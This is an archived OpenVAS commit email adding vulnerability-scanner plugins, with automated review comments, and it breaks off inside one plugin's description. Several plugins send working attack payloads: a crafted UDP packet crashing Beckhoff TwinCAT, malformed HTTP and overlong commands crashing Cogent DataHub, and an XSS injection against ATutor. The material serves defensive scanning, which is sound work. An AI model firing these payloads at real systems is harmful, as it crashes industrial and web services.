[Openvas-commits] r11653 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Sep 22 10:24:09 CEST 2011


Author: veerendragg
Date: 2011-09-22 10:24:03 +0200 (Thu, 22 Sep 2011)
New Revision: 11653

Added:
   trunk/openvas-plugins/scripts/gb_beckhoff_twincat_datagram_pkt_dos_vuln.nasl
   trunk/openvas-plugins/scripts/gb_cde_rpc_cmsd_service_detect.nasl
   trunk/openvas-plugins/scripts/gb_cogent_datahub_integer_overflow_vuln.nasl
   trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl
   trunk/openvas-plugins/scripts/gb_libcloud_ssl_cert_sec_bypass_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_atutor_mult_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_ms10-072.nasl
   trunk/openvas-plugins/scripts/secpod_pentaho_bi_server_mult_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_wordpress_zingiri_web_shop_rfi_vuln.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Added new plugins.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/ChangeLog	2011-09-22 08:24:03 UTC (rev 11653)
@@ -1,3 +1,17 @@
+2011-09-22  Veerendra G.G <veerendragg at secpod.com>,
+
+	* scripts/secpod_atutor_mult_vuln.nasl,
+	scripts/gb_cogent_datahub_integer_overflow_vuln.nasl,
+	scripts/gb_libcloud_ssl_cert_sec_bypass_vuln.nasl,
+	scripts/gb_cogent_datahub_unicode_bof_vuln.nasl,
+	scripts/secpod_wordpress_zingiri_web_shop_rfi_vuln.nasl,
+	scripts/gb_cde_rpc_cmsd_service_detect.nasl,
+	scripts/secpod_pentaho_bi_server_mult_vuln.nasl,
+	scripts/gb_beckhoff_twincat_datagram_pkt_dos_vuln.nasl,
+	scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl,
+	scripts/secpod_ms10-072.nasl:
+	Added new plugins.
+
 2011-09-20 Thomas Reinke <reinke at securityspace.com>
 
 	scripts/CA_License_Service_Stack_Overflow.nasl,

Added: trunk/openvas-plugins/scripts/gb_beckhoff_twincat_datagram_pkt_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_beckhoff_twincat_datagram_pkt_dos_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/gb_beckhoff_twincat_datagram_pkt_dos_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,131 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_beckhoff_twincat_datagram_pkt_dos_vuln.nasl 17132 2011-09-19 21:20:33Z sep $
+#
+# Beckhoff TwinCAT 'TCATSysSrv.exe' Network Packet Denial of Service Vulnerability
+#
+# Authors:
+# Veerendra G.G <veerendragg at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802036);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49599);
+  script_cve_id("CVE-2011-0514");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Beckhoff TwinCAT 'TCATSysSrv.exe' Network Packet Denial of Service Vulnerability");
+  desc = "
+  Overview: This host is installed with Beckhoff TwinCAT and is prone to
+  denial of service vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by an error in the 'TCATSysSrv.exe' when performing an
+  invalid read access, which can be exploited by remote attacker by sending
+  malformed packet to port 48899/UDP.
+
+  Impact:
+  Successful exploitation will let the attackers to cause denial of service
+  condition
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Beckhoff TwinCAT Version 2.11 build 1553,Other versions may also be affected.
+
+  Fix: No solution or patch is available as on 20th September 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.beckhoff.de/twincat/
+
+  References:
+  http://secunia.com/advisories/45981
+  http://www.exploit-db.com/exploits/17835
+  http://packetstormsecurity.org/files/view/105088
+  http://aluigi.altervista.org/adv/twincat_1-adv.txt
+  http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-06.pdf ";
+
+  script_description(desc);
+  script_summary("Check Beckhoff TwinCAT is vulnerable to DoS");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Denial of Service");
+  script_require_ports(48899, 48898);
+  exit(0);
+}
+##
+## The script code starts here
+##
+
+## Beckhoff TwinCAT TCP port
+tcp_port = 48898;
+
+## Check tcp port status
+if(!get_port_state(tcp_port)){
+  exit(0);
+}
+
+## Beckhoff TwinCAT UDP port
+udp_port = 48899;
+
+## Check udp port status
+if(!get_udp_port_state(udp_port)){
+  exit(0);
+}
+
+## Confirm Beckhoff TwinCAT other port is running
+## This port also stops listening, if exploit works successfully
+soc = open_sock_tcp(tcp_port);
+if(!soc){
+  exit(0);
+}
+close(soc);
+
+##  Open udp socket
+soc1 = open_sock_udp(udp_port);
+if(!soc1){
+  exit(0);
+}
+
+## Crafted udp packet
+req = raw_string(
+                  0x03, 0x66, 0x14, 0x71, 0x00, 0x00, 0x00, 0x00,
+                  0x06, 0x00, 0x00, 0x00, 0x0a, 0xff, 0xff, 0x02,
+                  0x01, 0x01, 0x10, 0x27,
+                  crap(data:raw_string(0xff), length:1514)
+                );
+
+## send the data
+send(socket:soc1, data:req);
+send(socket:soc1, data:req);
+
+## wait for 7 sec
+sleep(7);
+
+## Confirm Beckhoff TwinCAT Server alive or dead by checking
+## TCP port 48898 as it's hard to detect UDP port status and
+## available function will not work properly
+soc2 = open_sock_tcp(tcp_port);
+if(!soc2)
+{
+  security_hole(udp_port);
+  exit(0);
+}
+close(soc2);
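Review bot: The UDP socket `soc1` opened before the crafted packet is sent is never closed, so the script leaks a descriptor on every path, including the `exit(0)` inside the final check; add `close(soc1);` right after the two `send()` calls. The verdict also rests on a single `open_sock_tcp(tcp_port)` attempt after the 7-second sleep, so a transient connect failure is reported as a confirmed crash; retrying the reconnect once or twice before calling `security_hole()` would cut false positives. Finally, the report call is `security_hole(udp_port)` although the script tags the issue as cvss 5.0 / Medium, whereas gb_cogent_datahub_integer_overflow_vuln.nasl in the same commit reports its 5.0 issue with `security_warning()`; one of the two should change so severity and report level agree.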

Added: trunk/openvas-plugins/scripts/gb_cde_rpc_cmsd_service_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cde_rpc_cmsd_service_detect.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/gb_cde_rpc_cmsd_service_detect.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cde_rpc_cmsd_service_detect.nasl 16462 2011-09-16 19:14:17 sep $
+#
+# Calendar Manager Service rpc.cmsd Service Detection
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802163);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-1999-0696", "CVE-1999-0320");
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Calendar Manager Service rpc.cmsd Service Detection");
+  desc = "
+  Overview: This script detects the running 'rpc.cmsd' service on the host.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in the 'rpc.cmsd' service. If this service
+  is running then disable it as it may become a security issue.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code with
+  the privileges of the rpc.cmsd daemon, typically root. With some
+  configurations rpc.cmsd runs with an effective userid of daemon, while
+  retaining root privileges.
+
+  Impact Level: System
+
+  Fix: No solution or patch is available as on 16th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+
+  Workaround:
+  Disable the rpc.cmsd daemon service.
+
+  References:
+  http://www.cert.org/advisories/CA-99-08-cmsd.html
+  http://www.iss.net/security_center/reference/vuln/sun-cmsd-bo.htm
+  http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9908-102 ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_summary("Checks the presence of a RPC service 'rpc.cmsd'");
+  script_category(ACT_GATHER_INFO);
+  script_family("RPC");
+  script_dependencies("secpod_rpc_portmap.nasl");
+  script_require_keys("rpc/portmap");
+  exit(0);
+}
+
+include("misc_func.inc");
+
+if(report_paranoia < 2){
+ exit(0);
+}
+
+RPC_PROG = 100068;
+
+## Get the rpc port, running rpc.rquotad service
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_UDP);
+if(port)
+{
+  security_hole(port);
+  exit(0);
+}
+
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_TCP);
+if(port){
+  security_hole(port);
+  exit(0);
+}
+
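Review bot: The comment above the first `get_rpc_port()` call says the script looks for the `rpc.rquotad` service, but `RPC_PROG` is 100068 and the script name, summary and description all refer to `rpc.cmsd`; change it to `## Get the rpc port running the rpc.cmsd service`. The script is a presence check with no version test, yet it reports `security_hole()` with cvss 10.0 as soon as the program is registered with the portmapper, and the `report_paranoia < 2` gate only partly offsets that; the description should say explicitly that the finding means the daemon is registered, not that a vulnerable build was confirmed.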

Added: trunk/openvas-plugins/scripts/gb_cogent_datahub_integer_overflow_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cogent_datahub_integer_overflow_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/gb_cogent_datahub_integer_overflow_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cogent_datahub_integer_overflow_vuln.nasl 17101 2011-09-22 11:11:11Z sep $
+#
+# Cogent DataHub Integer Overflow Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802247);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49611);
+  script_cve_id("CVE-2011-3501");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Cogent DataHub Integer Overflow Vulnerability");
+  desc = "
+  Overview: The host is running Cogent DataHub and is prone to integer overflow
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to an integer overflow error in the webserver when
+  handling the HTTP 'Content-Length' header can be exploited by sending
+  specially crafted HTTP requests.
+
+  Impact:
+  Successful exploitation may allow remote attackers to allows remote attackers
+  to cause a denial of service.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Cogent DataHub 7.1.1.63 and prior.
+
+  Fix: No solution or patch is available as on 22th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.cogentdatahub.com/Products/Cogent_DataHub.html
+
+  References:
+  http://secunia.com/advisories/45967
+  http://aluigi.altervista.org/adv/cogent_3-adv.txt
+  http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-03.pdf ";
+
+  script_description(desc);
+  script_summary("Determine Cogent DataHub Integer Overflow Vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Denial of Service");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Send and Receive the response
+req = http_get(item:string("/index.asp"),  port:port);
+res = http_send_recv(port:port, data:req);
+
+## Confirm the application
+if("<title>DataHub Web Server</title>" >!< res) {
+  exit(0);
+}
+
+## Construct Attack Request
+attack = string( "POST / HTTP/1.1\r\n",
+                 "Host: localhost\r\n",
+                 "Content-Length: -1\r\n\r\n",
+                 crap(4079));
+
+## Send Attack
+res = http_send_recv(port:port, data:attack);
+
+## Check server is dead or alive
+res = http_send_recv(port:port, data:req);
+if(! res)
+{
+  if(http_is_dead(port:port)) {
+    security_warning(port);
+  }
+}
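Review bot: The description block requires `Services/www` but declares no `script_dependencies("http_version.nasl")`, unlike secpod_atutor_mult_vuln.nasl in the same commit, so the key may not be populated when this plugin is scheduled and `get_http_port()` would always fall back to the default; add the dependency next to `script_require_ports`. The attack request also hard-codes `Host: localhost`, while the application check before it goes through `http_get()`, which builds its own `Host:` header; on a name-based virtual host the two requests can reach different servers and the dead-or-alive check then measures the wrong one. Using `get_host_name()` in the `Host:` header, as secpod_atutor_mult_vuln.nasl does, keeps the two requests consistent.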

Added: trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,111 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cogent_datahub_unicode_bof_vuln.nasl 17101 2011-09-22 11:11:11Z sep $
+#
+# Cogent DataHub Unicode Buffer Overflow Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802246);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49611);
+  script_cve_id("CVE-2011-3493");
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Cogent DataHub Unicode Buffer Overflow Vulnerability");
+  desc = "
+  Overview: The host is running Cogent DataHub and is prone to buffer overflow
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to a stack based unicode buffer overflow error in the
+  'DH_OneSecondTick' function, which can be exploited by sending specially
+  crafted 'domain', 'report_domain', 'register_datahub', or 'slave' commands.
+
+  Impact:
+  Successful exploitation may allow remote attackers to execute arbitrary code
+  within the context of the privileged domain or cause a denial of service
+  condition.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Cogent DataHub 7.1.1.63 and prior.
+
+  Fix: No solution or patch is available as on 22th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.cogentdatahub.com/Products/Cogent_DataHub.html
+
+  References:
+  http://secunia.com/advisories/45967
+  http://aluigi.altervista.org/adv/cogent_1-adv.txt
+  http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-03.pdf ";
+
+  script_description(desc);
+  script_summary("Determine Cogent DataHub Buffer Overflow Vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  script_dependencies("find_service.nes");
+  script_require_ports(4502);
+  exit(0);
+}
+
+
+include("http_func.inc");
+
+## Get Default Port
+port = 4502;
+if(!get_port_state(port)){
+ exit(0);
+}
+
+## Open the socket
+soc = open_sock_tcp(port);
+if(!soc){
+  exit(0);
+}
+
+## Construct Attack Request
+attack =  crap(data: "a", length:512);
+req = string('(domain "', attack, '")', raw_string(0x0a),
+             '(report_domain "', attack, '" 1)', raw_string(0x0a),
+             '(register_datahub "',attack, '")\r\n', raw_string(0x0a),
+             '(slave "', attack, '" flags id1 id2 version secs nsecs)',
+             raw_string(0x0a));
+
+## Sending Attack
+send(socket:soc, data:req);
+send(socket:soc, data:req);
+close(soc);
+
+sleep(5);
+
+## Open the socket and
+## Check server is dead or alive
+soc = open_sock_tcp(port);
+if(!soc){
+  security_hole(port);
+  exit(0);
+}
+close(soc);
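Review bot: Nothing confirms that the listener on port 4502 is Cogent DataHub before the crafted commands are sent: the only gate is `get_port_state(port)`, so any service on that port receives the payload and, if it does not accept a new connection within five seconds, is reported with `security_hole()`; secpod_metaserver_rt_multiple_dos_vuln.nasl in this commit has the same pattern on port 2194 with a 3-second wait. gb_cogent_datahub_integer_overflow_vuln.nasl fingerprints the application first; if this protocol offers no usable banner, at least confirm the reconnect failure with a second `open_sock_tcp(port)` attempt after a further pause before reporting, and say in a comment that the verdict is inferred from connection refusal alone.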

Added: trunk/openvas-plugins/scripts/gb_libcloud_ssl_cert_sec_bypass_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_libcloud_ssl_cert_sec_bypass_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/gb_libcloud_ssl_cert_sec_bypass_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_libcloud_ssl_cert_sec_bypass_vuln.nasl 17119 2011-09-19 13:23:29Z sep $
+#
+# Libcloud SSL Certificates Security Bypass Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802164);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2010-4340");
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Libcloud SSL Certificates Security Bypass Vulnerability");
+  desc = "
+  Overview: This host is installed with Libcloud and is prone to security
+  bypass vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to improper verification of SSL certificates for
+  HTTPS connections.
+
+  Impact:
+  Successful exploitation will let the attackers to spoof certificates and
+  bypass intended access restrictions via a man-in-the-middle (MITM) attack.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  libcloud version prior to 0.4.1
+
+  Fix: Upgrade to  libcloud version 0.4.1 or later
+  For updates refer, http://libcloud.apache.org/
+
+  References:
+  http://wiki.apache.org/incubator/LibcloudSSL
+  https://issues.apache.org/jira/browse/LIBCLOUD-55
+  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=598463 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Libcloud");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  exit(0);
+}
+
+
+include("ssh_func.inc");
+include("version_func.inc");
+
+sock = ssh_login_or_reuse_connection();
+if(!sock){
+  exit(0);
+}
+
+## Confirm Linux, as SSH can be installed on Windows as well
+result = ssh_cmd(socket:sock, cmd:"uname");
+if("Linux" >!< result){
+  exit(0);
+}
+
+## Get the file location
+libName = find_file(file_name:"__init__.py", file_path:"/libcloud/", 
+                            useregex:TRUE, regexpar:"$", sock:sock);
+
+## Check for the each path
+if(libName)
+{
+  foreach binaryName (libName)
+  {
+    ## Get the version
+    libVer = get_bin_version(full_prog_name:"cat", sock:sock,
+                             version_argv:chomp(binaryName),
+                             ver_pattern:"= '([0-9.]+)'");
+    if(libVer[1])
+    {
+      ## Check the version
+      if(version_is_less(version:libVer[1], test_version:"0.4.1"))
+      {
+        security_warning(0);
+        exit(0);
+      }
+    }
+  }
+}
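Review bot: The `ver_pattern:"= '([0-9.]+)'"` regex matches any single-quoted dotted-number assignment in `__init__.py`, not specifically the module's version attribute, so an unrelated constant earlier in the file can be read as the version and either mask or fabricate a finding; anchoring on the attribute name, e.g. `ver_pattern:"__version__ *= *'([0-9.]+)'"` if that is how the installed module exposes it, is safer. The description block also declares no `script_dependencies()` on the SSH credential plugin even though the check is built on `ssh_login_or_reuse_connection()`; if the tree's other SSH-based plugins declare one, this script should too so credentials are available when it runs. The `"Linux" >!< result` gate silently skips installs on other Unix-like hosts, which the description should state.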

Added: trunk/openvas-plugins/scripts/secpod_atutor_mult_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_atutor_mult_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/secpod_atutor_mult_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,128 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_atutor_mult_vuln.nasl 16586 2011-09-20 19:35:01Z sep $
+#
+# Atutor Multiple Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902728);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49057);
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Atutor Multiple Vulnerabilities");
+  desc = "
+  Overview: This host is running Atutor and is prone to information disclosure,
+  SQL injection, and cross site scripting vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are due to an,
+  - Input passed to the 'lang' parameter in '/documentation/index_list.php' is
+    not properly sanitised before being returned to the user.
+  - Input passed to the 'p_course', 'name' and 'value' parameters in
+    '/mods/_standard/social/set_prefs.php' scripts is not properly sanitised
+    before being used in SQL queries.
+  - Input passed via the 'search_friends_HASH' POST parameter, where HASH is
+    the value generated by the 'rand_key' parameter, to the
+    '/mods/_standard/social/index_public.php' script is not properly sanitised
+    before being returned to the user.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary script code
+  or to compromise the application, access or modify data, or exploit latent
+  vulnerabilities in the underlying database.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  ATutor version 2.0.2
+
+  Fix: No solution or patch is available as on 21th September 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer,  http://www.atutor.ca/atutor/
+
+  References:
+  http://www.exploit-db.com/exploits/17631/
+  http://securityreason.com/wlb_show/WLB-2011080041
+  http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5037.php
+  http://packetstormsecurity.org/files/view/103765/ZSL-2011-5037.txt ";
+
+  script_description(desc);
+  script_summary("Check if Atutor is vulnerable to Cross Site Scripting");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("http_version.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)) {
+  exit(0);
+}
+
+## Check for each possible path
+foreach dir (make_list("/ATutor", "/atutor", "", cgi_dirs()))
+{
+  ## Send and Receive the response
+  req = http_get(item:string(dir,"/login.php"), port:port);
+  res = http_keepalive_send_recv(port:port,data:req);
+
+  ## Confirm the application
+  if("ATutor<" >< res)
+  {
+    rand = rand();
+    xss = 'search_friends_' + rand + '=1>"><script>alert(1)</script>&search=' +
+          'Search&rand_key=' + rand;
+    host = get_host_name();
+    filename = string(dir + "/mods/_standard/social/index_public.php");
+
+    ## Construct post request
+    sndReq2 = string( "POST ", filename, " HTTP/1.1\r\n",
+                      "Host: ", host, "\r\n",
+                      "User-Agent: OpenVAs-Agent\r\n",
+                      "Content-Type: application/x-www-form-urlencoded\r\n",
+                      "Content-Length: ", strlen(xss), "\r\n\r\n",
+                       xss);
+
+    ## Check the response to confirm vulnerability
+    rcvRes2 = http_keepalive_send_recv(port:port, data:sndReq2);
+    if('"><script>alert(1)</script>' >< rcvRes2)
+    {
+      security_hole(port);
+      exit(0);
+    }
+  }
+}
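Review bot: The POST in the loop is assembled by hand with a misspelled `User-Agent: OpenVAs-Agent` header, while the first request in the same loop goes through `http_get()`; building the second with the matching `http_post()` helper, if `http_func.inc` provides it, would remove the duplicated header logic and the typo at once, otherwise change the header to `User-Agent: OpenVAS-Agent`. The vulnerability verdict is a bare substring check for `"><script>alert(1)</script>` in the response, which any page that echoes the request body unescaped would satisfy; also requiring a success status, e.g. `"HTTP/1.1 200" >< rcvRes2`, tightens it. The local variable `rand` reuses the name of the `rand()` builtin it was just assigned from; renaming it to something like `rand_key` helps readability.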

Added: trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl	2011-09-21 15:43:44 UTC (rev 11652)
+++ trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl	2011-09-22 08:24:03 UTC (rev 11653)
@@ -0,0 +1,102 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_metaserver_rt_multiple_dos_vuln.nasl 17305 2011-09-21 15:15:15Z sep $
+#
+# MetaServer RT Multiple Remote Denial of Service Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902569);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49696);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("MetaServer RT Multiple Remote Denial of Service Vulnerabilities");
+  desc = "
+  Overview: The host is running MetaServer RT and is prone to multiple remote
+  denial of service vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to an error when processing certain packets
+  and can be exploited to cause a crash via a specially crafted packet.
+
+  Impact:
+  Successful exploitation may allow remote attackers to execute arbitrary code
+  on the system or cause a denial of service condition.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  MetaServer RT version 3.2.1.450 and prior.
+
+  Fix: No solution or patch is available as on 21st September 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.traderssoft.com/ts/msrt/
+
+  References:
+  http://secunia.com/advisories/46059
+  http://www.exploit-db.com/exploits/17879/
